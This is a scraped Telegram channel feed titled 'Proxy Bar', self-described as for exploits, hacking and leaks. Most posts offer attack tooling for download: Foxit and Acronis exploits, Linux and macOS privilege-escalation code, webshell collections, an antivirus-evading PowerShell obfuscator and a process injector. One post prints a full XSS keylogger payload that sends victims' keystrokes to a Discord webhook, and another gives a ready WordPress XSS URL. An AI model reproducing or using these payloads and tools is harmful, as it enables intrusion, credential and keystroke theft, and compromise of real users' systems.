Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2022-45451
Acronis POC
download
🔥4👍1
Большая коллекция WEBSHELLS
На asp, aspx, php, jsp, pl, py, etc
download

#webshell
👍8
Super Xray
Web Vulnerability Scanner
download

#web #vuln #scanner
👍7🔥5
CVE-2022-28672_exploit.zip
16.3 KB
CVE-2022-28672
Foxit PDF Reader Remote Code Execution Exploit (NOT POC))))
👍10🔥1
Бэкдоры в FreePBX
PHP бэкдор, который добавляет своего пользователя (mgknight), удаляет законных юзеров, кодируется в base64 и переписывает .htaccess - встречайте на ваших серваках телефонии)))
Пятничное расследование читать

#freepbx #backdoor
🔥7😱3👍2
Dirty Vanity
новая техника внедрения, злоупотребляющая Windows fork API для обхода EDR.
Слайды тут
POC тут

#windows #bypass #edr
🔥6
MacDirtyCowDem
Получаем root в macOS 13.0.1 через CVE-2022-46689
exploit



#root #macos #exploit
🔥9
powershell-obfuscation
Обфускатор Powershell anti-kill, простой и эффективный, проходит все VT (когда трава была зеленее)
download
🔥12😱3👍2
linux injector

Инжектим в общие библиотеки x64 Linux. (без ptrace - а то на ptrace root права нужны, а права повышать в системе в падлу)
usage:
linux_injector <pid> <module>
Да да, все так просто, иди уже.

download
🔥9😱3👍1
Только ВАЖНЫЕ вопросы !

#hackers #xss
👍22🔥13😱6
Атаки на web-приложения на JAVA
Это обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.
download
*
Bonus track
Jar Analyzer
GUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода.
download

#java #security #web #hack
🔥5👍3
Cloudmare
Палим реальные IPадреса сайтов защищенных Cloudflare, Sucuri или Incapsula.
Но таки да - работает только если криво настроен DNS.
download
🔥14👍2😱1
Php Remote file Inclusion and RCE in flatpressblog/flatpress
Proof of Concept

#php #vuln
👍4
log4j
ДА, еще один, но попроще
usage:
python3 hik.py https://localhost:443 xxx.oastify.com:80

downLoad
🔥9👍1😱1
Оценка уязвимостей с помощью Nmap ?
Вам нужен Vultriever !
*
Из коробки Vultriever умеет:

Server IP address
Network port number
Network port status
Protocol used by the network port
Network service operating on the network port and its version
Vulnerability CVE-identifier
Vulnerability rating
URL-link to the denoscription of the vulnerability on the platform Vulners.com

Заказывайте прямо сейчас с уникальной финкой лгбт



Download
👍7🔥3😱3
CVE-2022-2602 - exploit
Опубликован PoC Kernel Privilege Escalation Linux
*
О чем это, прочитать тут_1 и тут_2
*
POC (точнее два) - забрать
Exploit - забрать

#linux #kernel #exploits
😱5
Охота на C2 C&C сервера
Понимание работы и обнаружение фреймворков C2 (C&C)
*
1. Understanding & Detecting C2 Frameworks — TrevorC2
2. Understanding & Detecting C2 Frameworks — Ares
3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)
4. Understanding & Detecting C2 Frameworks — BabyShark
*
BonusTrack:
Download BabyShark

#C2 #hackers #botnets
🔥11😱2
Linux Kernel RCE (ksmbd)
*
CVSS SCORE: 10 из 10
*
Детали тут
Патч прилетел в ядро только в ветке 5.15.61


#10из10
🔥10👍2
XSS Payload - Discord Keylogger
usage:
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>

#discord #xss
🔥7👍6
Wordpress - XSS ( CVE-2022-29455)
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==

#wordpress #xss
👍17🔥7
CVE-2022-42046 Наконец то опубликовали
local privilege escalation
POC download

#windows #lpe #poc
🔥5👍3